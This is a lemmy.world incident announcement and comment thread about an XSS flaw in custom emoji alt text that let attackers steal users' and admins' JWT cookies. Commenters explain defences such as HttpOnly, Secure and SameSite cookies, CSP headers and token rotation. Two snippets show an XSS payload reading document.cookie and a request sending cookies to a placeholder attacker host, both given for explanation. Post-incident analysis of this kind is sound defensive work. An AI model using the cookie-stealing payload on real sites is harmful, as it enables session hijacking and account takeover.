While I was asleep, apparently the site was hacked. Luckily, a (big) part of the lemmy.world team is in the US, and some early birds in the EU also helped mitigate this.

As I am told, this was the issue:

  • There is a vulnerability which was exploited
  • Several people had their JWT cookies leaked, including at least one admin
  • Attackers started changing site settings and posting fake announcements, etc.

Our mitigations:

  • We removed the vulnerability
  • Deleted all comments and private messages that contained the exploit
  • Rotated JWT secret which invalidated all existing cookies
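
As an aside for readers wondering why rotating the JWT secret logs everyone out: a token is only accepted if its signature matches the server’s current secret, so changing the secret invalidates every cookie issued before the rotation. A minimal sketch using the Node.js jsonwebtoken library (Lemmy itself is written in Rust, so this is only an illustration, not Lemmy’s code):

```typescript
import jwt from "jsonwebtoken";

// A token signed with the old secret - this is what a stolen cookie would contain.
const stolen = jwt.sign({ sub: "some-user" }, "old-secret");

// Verification against the old secret succeeds...
jwt.verify(stolen, "old-secret");

// ...but once the secret is rotated, every previously issued token fails
// verification, so stolen cookies become useless and everyone must log in again.
try {
  jwt.verify(stolen, "new-secret");
} catch {
  console.log("invalid signature - token rejected");
}
```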

The vulnerability will be fixed by the Lemmy devs.

Details of the vulnerability are here

Many thanks for all that helped, and sorry for any inconvenience caused!

Update: While we believe the admin accounts were what they were after, it could be that other users’ accounts were compromised. Your cookie could have been ‘stolen’ and the hacker could have had access to your account, creating posts and comments under your name, and accessing/changing your settings (which show your e-mail).

For this, you would have had to be using lemmy.world at that time, and load a page that had the vulnerability in it.

  • Marek Knápek@lemmy.world · 1 year ago

    So what happened:

    • Someone posted a post.
    • The post contained some instruction to display custom emoji.
    • So far so good.
    • There is a bug in the JavaScript (TypeScript) that runs on the client’s machine (arbitrary code execution?).
    • The attacker leveraged the bug to grab the victim’s JWT (cookie) when the victim visited the page with that post.
    • The attacker used the grabbed JWTs to log in as the victims (some of them were admins) and do bad stuff on the server.

    Am I right?

    I’m an old-school developer/programmer and it seems that the web is a peace of sheet. Basic security stuff violated:

    • User-provided content (a post using custom emojis) caused havoc when processed (doesn’t matter if on the server or on the client). This is a lack of sanitization of user-provided data.
    • JavaScript (TypeScript) has access to cookies (and thus the JWT). This should be handled by the web browser, not JS. In case of log-in, in the HTTPS POST request, and in case of a successful log-in, in the HTTPS POST response. Then, when requesting a web page, again, it should be handled in the HTTPS GET request. This is a lack of using the least permissions possible; JS should not have access to cookies.
    • How did the attacker get those JWTs? Did JavaScript send them to him? Did the web browser send them to him when requesting resources from his server? This is a lack of site isolation; one web page should not have access to other domains, requesting data from them or sending data to them.
    • The attacker logged in as an admin and caused havoc. Again, this should not be possible; admins should have a normal level of access to the site, exactly the same as normal users do. Then, if they want to administer something, they should log in using a separate username + password into a separate log-in form and be shown a completely different web page, not allowing them to do the actions normal users can do. You know, separate UIs/applications for users and for admins.

    Am I right? Correct me if I’m wrong.

    Again, the web is a peace of sheet. This would never happen in a desktop/server application. Any of the bullet points above would have prevented this from happening, even if the previous bullet point failed to do its job. Am I too naïve? Maybe.

    Marek.

    • abhibeckert@lemmy.world · edited · 1 year ago

      I’m an old-school developer/programmer and it seems that the web is a peace of sheet. Basic security stuff violated:

      I’m a modern web developer who used to be an old-school one.

      User-provided content (a post using custom emojis) caused havoc when processed (doesn’t matter if on the server or on the client). This is a lack of sanitization of user-provided data.

      Yeah - pretty much, though there are some mitigating factors.

      Strictly speaking, it was the alt text for the emoji. Alt text is HTML, and rather than allow arbitrary HTML they allowed another language called Markdown. Markdown is a plain-text language with human-readable syntax specifically designed to be converted into HTML.

      Markdown is the right format to use for emoji alt text, but you do need to be careful of one thing - the original purpose of Markdown was to make HTML content easier to write/read, and it is a superset of the HTML language. So arbitrary HTML is valid Markdown.

      Virtually all modern Markdown parsers disable arbitrary HTML by default, but it’s a behaviour which can be changed and that leaves potential for mistakes like this one here. Specifically the way Lemmy injected emojis with alt text into the Markdown content allowed arbitrary HTML.
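
      To make the default concrete, here is a hedged sketch using the markdown-it library (a common Markdown parser for TypeScript; not necessarily Lemmy’s actual renderer or configuration) showing how the html option changes what user-supplied alt text can do:

      ```typescript
      import MarkdownIt from "markdown-it";

      // User-controlled emoji alt text containing raw HTML with a script payload.
      const altText = `<img src=x onerror="alert(document.cookie)">`;

      // With raw HTML disabled (markdown-it's default), the payload is escaped
      // and rendered as harmless text.
      const safe = new MarkdownIt({ html: false }).render(altText);

      // With raw HTML enabled, the same input passes through verbatim and the
      // browser will run the onerror handler.
      const unsafe = new MarkdownIt({ html: true }).render(altText);

      console.log(safe);   // the tag is escaped: &lt;img ...&gt;
      console.log(unsafe); // the live <img onerror=...> tag
      ```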

      This wasn’t an obvious mistake - the issue over on Lemmy’s issue tracker is titled “Possible XSS Attack” because they knew there was an XSS attack somewhere and they weren’t immediately sure if they had found it in the emoji system. Even now, reading the diff that fixes the vulnerability, it still isn’t obvious to me what they did wrong.

      It’s fairly complex code and complexity is the enemy of security… but sometimes you have to do complex things. Back in the “old-school” days, nobody would have even attempted to write something as complicated as a federated social network…

      JavaScript (TypeScript) has access to cookies (and thus the JWT). This should be handled by the web browser, not JS.

      Yeah - the Lemmy developers made a mistake there. There are a few things they aren’t doing right around cookies and JWT tokens.

      Hopefully they fix it. I expect they will… It was already actively being discussed before this incident, and those discussions have been seen by a lot more people now.
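
      For the curious, the usual way to keep a session token out of reach of page scripts is to have the server set it as an HttpOnly cookie. A hedged sketch using Express purely to illustrate the flags (Lemmy’s backend is Rust, so this is not their code):

      ```typescript
      import express from "express";

      // Placeholder for whatever actually authenticates the user and issues a JWT.
      declare function issueJwtSomehow(): string;

      const app = express();

      app.post("/login", (_req, res) => {
        const token = issueJwtSomehow();
        res.cookie("jwt", token, {
          httpOnly: true,     // invisible to document.cookie, so injected JS can't read it
          secure: true,       // only ever transmitted over HTTPS
          sameSite: "strict", // not attached to cross-site requests (CSRF mitigation)
          maxAge: 7 * 24 * 60 * 60 * 1000, // expire after a week
        });
        res.sendStatus(204);
      });
      ```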

      How did the attacker get those JWTs? Did JavaScript send them to him? Did the web browser send them to him when requesting resources from his server? This is a lack of site isolation; one web page should not have access to other domains, requesting data from them or sending data to them.

      There are several levels of isolation that could have blocked this:

      1. Users should not be able to inject arbitrary HTML.
      2. A flag should be set on the page telling the browser to ignore JavaScript in the body of the page. This is a relatively new web feature, disabled by default for obvious backwards-compatibility reasons, but it should be set especially on a high-value target like Lemmy, and I expect that once it’s been around a little longer browsers will enable it by default.
      3. A flag should have been set to block JavaScript from contacting an unknown third-party domain. Again, this isolation is a relatively new web feature and currently disabled by default (see the header sketch after this list).
      4. As you say, JavaScript shouldn’t be able to access the JWT token or the cookie. That’s not a new feature in the web; it’s just one the Lemmy developers didn’t take advantage of (I don’t know why).
      5. Even if all of those previous levels of isolation failed… there are things Lemmy should be doing to mitigate the attack. In particular, instance admins have had to manually reset JWT tokens. Those tokens should have expired somehow on their own - possibly the moment the attacker tried to use them.
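
      Points 2 and 3 are most likely describing Content-Security-Policy directives. A hedged sketch of what such a header could look like, sent from Express middleware purely for illustration (the directive values are assumptions, not Lemmy’s actual policy):

      ```typescript
      import express from "express";

      const app = express();

      // Attach a Content-Security-Policy header to every response.
      app.use((_req, res, next) => {
        res.setHeader(
          "Content-Security-Policy",
          [
            "default-src 'self'",    // only load resources from our own origin by default
            "script-src 'self'",     // no inline <script> blocks, no third-party scripts (point 2)
            "connect-src 'self'",    // fetch/XHR may only talk to our own origin (point 3)
            "img-src 'self' https:", // images may come from any HTTPS host (e.g. federated emojis)
          ].join("; ")
        );
        next();
      });
      ```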

      The attacker logged in as an admin and caused havoc. Again, this should not be possible; admins should have a normal level of access to the site, exactly the same as normal users do. Then, if they want to administer something, they should log in using a separate username + password into a separate log-in form and be shown a completely different web page, not allowing them to do the actions normal users can do. You know, separate UIs/applications for users and for admins.

      Yep - the modern best practice is for admins to manage the site via a completely different system. That adds considerable complexity and cost though, so it’s rarely done unfortunately. But you know, Lemmy is open source… so if someone wants to take on that work they can do it.

      I’ll add one more - it should have taken less time to close the exploit… but given this is the first serious exploit I’ll forgive that.

      Ultimately, several failures contributed to this attack. I expect many of those failures will be corrected in the coming weeks, and that will make Lemmy far more secure than it is right now - so that next time there’s a bug like the one in the Markdown parser, it isn’t able to cause so much disruption.

      The good news is no harm was done, and a lot of people are going to learn some valuable lessons as a result of this incident. Ultimately the outcome is a positive one in my opinion.

      • Roggie@lemmynsfw.com · 1 year ago

        Awesome write-up, easy to understand for someone who doesn’t have much experience at all in coding. Thanks, it was a good read.

    • Mountaineer@lemmy.world · 1 year ago

      JavaScript (TypeScript) has access to cookies (and thus the JWT). This should be handled by the web browser, not JS. In case of log-in, in the HTTPS POST request, and in case of a successful log-in, in the HTTPS POST response. Then, when requesting a web page, again, it should be handled in the HTTPS GET request. This is a lack of using the least permissions possible; JS should not have access to cookies.

      JavaScript needs access to the cookies; they are the data storage for a given site.
      To protect them, the browser silos them to the individual site that created them; that’s why developers haven’t been able to easily load cross-domain content for years - to mitigate XSS attacks.
      The security relies on the premise that the only valid source of script is the originating domain.
      The flaw here was allowing clients to add arbitrary script that was displayed to others.
      You’re dead right that the only way to fix this is to do away with JavaScript access to certain things, but it would require a complete refactor of how cookies work.
      I haven’t done any web dev in a few years, this might even be a solved problem by now and we are just seeing an old school implementation. 🤷

      • Marek Knápek@lemmy.world · 1 year ago

        this might even be a solved problem by now

        Yes, it is called HttpOnly and is decided by the server that sends the cookie to you in an HTTP response header. I believe there are also HTTPS-only cookies that, when received via HTTPS, cannot be used over plain HTTP, but I cannot find it right now.
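
        For reference, both are just attributes on the Set-Cookie response header; a rough illustration (values made up, not Lemmy’s actual header):

        ```typescript
        // What the server would send:
        //   Set-Cookie: jwt=<token>; HttpOnly; Secure; SameSite=Strict
        //
        // HttpOnly - the browser still attaches the cookie to requests, but never
        //            exposes it to page scripts.
        // Secure   - the browser only transmits the cookie over HTTPS, never plain HTTP.
        console.log(document.cookie); // an HttpOnly jwt cookie would not appear here
        ```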

    • Marek Knápek@lemmy.world · 1 year ago

      Oh, I forgot another line of defense / basic security mitigation. If a server produces an access token (such as a JWT or any other old-school cookie / session ID), pair it with an IP address. So in case of cookie theft, the attacker cannot use this cookie from his computer (IP address). If the IP changes (mobile / WiFi / ADSL / whatever), the legitimate user should log in again, now storing two auth cookies. In case of another IP change, no problemo, one of the stored cookies will work. Of course, limit the validity of the cookie in time (let’s say, keep it valid only for a day or a week or so).
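
      A minimal sketch of what that binding could look like on the server (the names and the in-memory store are made up for illustration; this is not an existing Lemmy feature):

      ```typescript
      // A session token is only honoured when presented from the network it was issued to.
      interface Session {
        token: string;
        ipPrefix: string;  // e.g. the full IPv4 address, or an IPv6 /64 prefix
        expiresAt: number; // also limit validity in time, as suggested above
      }

      const sessions = new Map<string, Session>(); // token -> session

      function isSessionValid(token: string, clientIpPrefix: string, now = Date.now()): boolean {
        const s = sessions.get(token);
        if (!s) return false;
        if (now > s.expiresAt) return false;             // cookie too old: force a re-login
        if (s.ipPrefix !== clientIpPrefix) return false; // stolen cookie used from another network
        return true;
      }
      ```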

        • Marek Knápek@lemmy.world · 1 year ago

          mobile devices change IP addresses all the time

          I never noticed this. Yes, switching between mobile and WiFi, but that is only two addresses. In the case of IPv4 this doesn’t seem to be a problem. In the case of IPv6, use the /64 or /48 prefix (or whatever is now recommended for residential end users) instead of the entire 128 bits. I’m not proposing to log out the user after an IP change; I’m proposing multiple sessions to be accessible at the same time.
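
          A small sketch of extracting the /64 prefix that would be compared instead of the full address (simplified: it ignores zone IDs and IPv4-mapped forms):

          ```typescript
          // Expand an IPv6 address into its 8 hex groups, then keep the first 4:
          // that is the /64 network prefix typically delegated to a household.
          function ipv6Prefix64(addr: string): string {
            const [head, tail = ""] = addr.split("::");
            const headGroups = head ? head.split(":") : [];
            const tailGroups = tail ? tail.split(":") : [];
            const missing = 8 - headGroups.length - tailGroups.length;
            const groups = [...headGroups, ...Array(missing).fill("0"), ...tailGroups];
            return groups.slice(0, 4).map((g) => g.padStart(4, "0")).join(":");
          }

          // Two addresses from the same residential /64 map to the same prefix:
          ipv6Prefix64("2001:db8:1:2:aaaa:bbbb:cccc:dddd"); // "2001:0db8:0001:0002"
          ipv6Prefix64("2001:db8:1:2::1");                  // "2001:0db8:0001:0002"
          ```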

          • linearchaos@lemmy.world · 1 year ago

            Mobile will often switch IPs on tower handoffs. If you’re driving down the road or on a train, it’s nothing to change mobile IP addresses every 2 minutes.

            • Marek Knápek@lemmy.world · 1 year ago

              Not in my experience. But OK, if this is the case, don’t use the exact IPv4 address; look up the routing database and use the sub-net. Or whatever. This is belt & suspenders style defense in depth, just another layer of security if all the others fail. Not core functionality.

              • linearchaos@lemmy.world · 1 year ago

                I work for a mobile game company. Millions of clients. We deal with this a lot. You can’t even predict that they’ll stay in the same class A. I wouldn’t be surprised if they worked out a way to hand off IPv4 to IPv6 and vice versa.

                Then you have ISPs and large work networks that send everyone out under the same NAT/PAT, tens of thousands of users all coming from one address.

                IMO, providing a public service and then trying to identify individuals by network without screwing someone over is a fool’s errand.

                If you’re dipping into logs and see one jackass doing something on X IP, you always have to go back and see how many IPs that jackass is coming from, and also how much viable traffic is coming from that IP.

    • devnill@lemmy.world · 1 year ago

      You’re totally right. I just looked at my old JWT cookie and it was susceptible to CSRF (cross-site request forgery) by virtue of not having the SameSite flag set. This has since been fixed, but it looks like there might still be changes pending, as JavaScript is currently able to read the cookie value (the HttpOnly flag is currently set to false, meaning it can be accessed by scripts running in the page). While this isn’t a major risk, it does increase the attack surface a bit.

    • VeganPizza69 Ⓥ@lemmy.world · 1 year ago

      How did the attacker get those JWTs? Did JavaScript send them to him?

      If the “special emoji” code contained a script, it could simply read the cookie value and send it to a remote URL using an XMLHttpRequest. I don’t think it has to be decoded to be used.
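
      Roughly what such a payload looks like, as a generic illustration of the technique (not the actual exploit code; the collection URL is made up):

      ```typescript
      // If injected script runs in the page and the JWT cookie is not HttpOnly,
      // document.cookie hands it straight to the attacker:
      const xhr = new XMLHttpRequest();
      xhr.open("POST", "https://attacker.example/collect"); // attacker-controlled endpoint (fictional)
      xhr.send(document.cookie); // every cookie readable by JavaScript, JWT included
      ```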

    • ComeHereOrIHookYou@lemmy.world · 1 year ago

      The web being a PoS? Well, you’re certainly right on the money there. Not only that, but it has also become the norm for web technologies to be used in creating desktop applications too.

      So we’re bringing the security nightmare to desktop applications, and on top of that, it devours RAM like there’s no tomorrow, all for the sake of faster development.

    • dudebro@lemmy.world · 1 year ago

      To be fair, it’s not an issue with “the web.” A bug in JavaScript is not a problem for the web. It’s a problem for people who use JavaScript.